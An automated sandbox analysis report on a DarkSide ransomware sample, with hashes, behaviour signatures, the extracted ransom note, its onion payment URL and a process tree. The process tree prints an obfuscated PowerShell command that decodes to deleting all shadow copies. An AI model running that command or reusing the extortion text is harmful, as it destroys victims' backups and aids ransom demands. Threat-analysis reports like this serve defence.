Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    107s
  • max time network
    115s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-05-2021 15:56

General

  • Target

    6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

  • Size

    59KB

  • MD5

    5ff75d33080bb97a8e6b54875c221777

  • SHA1

    810d6c70a96584486867cedde111a1087ed1ebe7

  • SHA256

    6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff

  • SHA512

    a6b87ddcaa797a4d8abc06a786a7186fe43eef5e3291402f81b95a180b7fb746f88cd0f408a089deb5321ecf0d2ac3cca479fdc1f782771749df0ac5a082ac00

Malware Config

Extracted

Path

C:\\README.7b336f65.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/45NAQ3FNBX002JPHBAIKB97JVVABJQHTM2HO7XOZRXTEH98CRPXYX09X7VUH0F0W When you open our website, put the following data in the input form: Key: aB8lE86K6bt2yphn16ULYEWUkQgiDkVDBHvQuveSHbkkccXcFdx82fYYL2wEuCLtUlSIpghfBnR1iHFog7qrxDKEfU1MQE8uiUe0CjmMqYp429q5QWYrTRUEJV1UevaixL9cMAeVhTiFRe0PHhthK2V8MfjrySgetDXg40JSiHOZHOstlUnOpJpS6CGn9r9P96kf7j5EFu5dIymVAOfFOxkPx8iG9JDaEHm3hEkCGnII4XNwLbykXoVctE8r6OzBrnKNcLvkQTDMwFQh29kecXcnNniHRXVYNDy2SY49GY58TBuNA6MtaqHht98G9qRjFNAYKdEDX5G6IimaqgNF3QCsOiDko91l70T6rcrVpWNrSdGw4p9tnOyIXUfrUVZFeYManOWT8aqu0qTi2C69L8w1RzezAczWJiwIrt3zfkTLqHKotNih0ebqTia8uUcsHbn6u0z2v3LFDyasrZdNvlKq1rmZmljdEDt0jakl9ygQwOEnd8T7gyygbMUwiF7Nhj8UlGP9o1h2L94qObqhQZGKJFH8DuPbQnf9OczD9cyX0uJTJT5iuiu !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/45NAQ3FNBX002JPHBAIKB97JVVABJQHTM2HO7XOZRXTEH98CRPXYX09X7VUH0F0W

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 13 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
    "C:\Users\Admin\AppData\Local\Temp\6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2844
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1832

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2844-119-0x0000012861D40000-0x0000012861D41000-memory.dmp

    Filesize

    4KB

  • memory/2844-123-0x000001287AED0000-0x000001287AED1000-memory.dmp

    Filesize

    4KB

  • memory/2844-130-0x000001287A2A0000-0x000001287A2A2000-memory.dmp

    Filesize

    8KB

  • memory/2844-132-0x000001287A2A3000-0x000001287A2A5000-memory.dmp

    Filesize

    8KB

  • memory/2844-134-0x000001287A2A6000-0x000001287A2A8000-memory.dmp

    Filesize

    8KB